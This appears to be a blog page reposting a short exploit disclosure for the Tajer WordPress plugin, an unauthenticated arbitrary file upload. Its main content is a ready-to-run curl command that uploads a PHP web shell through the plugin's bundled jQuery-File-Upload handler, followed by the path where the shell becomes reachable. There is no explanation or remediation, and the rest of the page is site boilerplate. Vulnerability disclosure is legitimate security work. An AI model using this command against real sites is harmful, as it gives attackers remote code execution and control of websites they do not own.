Tajer – Unauthenticated Arbitrary File Upload

October 19, 2018
tajer-unauthenticated-arbitrary-file-upload Theme Builder Layout
curl -F "files=@shell.php" http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php

Shell is uploaded to:

http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/files/shell.php

Share this article:
 




eHost-square-ad Theme Builder Layout

We’re listening.

Have something to say about this article? Share it with us on Facebook, Twitter or LinkedIn:

SHARE IT HERE:

Related Posts

best-practices-for-managing-wordpress-activity-log-data Theme Builder Layout

Best practices for managing WordPress activity log data

The data stored in the WordPress activity log is sensitive and confidential. So should you back it up? Should you archive it and keep it secure?Many compliance regulations stipulate who can access such data, and how such data should be stored, secured and backed up....

using-wpscan-to-find-wordpress-vulnerabilities-on-your-website Theme Builder Layout

Using WPScan to find WordPress vulnerabilities on your website

WPScan is an open source WordPress security scanner. You can use it to scan your WordPress website for known vulnerabilities within the WordPress core, as well as popular WordPress plugins and themes.Since it is a WordPress black box scanner, it mimics a real...

Get ALL Your SEO, WordPress & Divi News

Join Our Daily Roundup

SEO News and More

SEO News and More

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.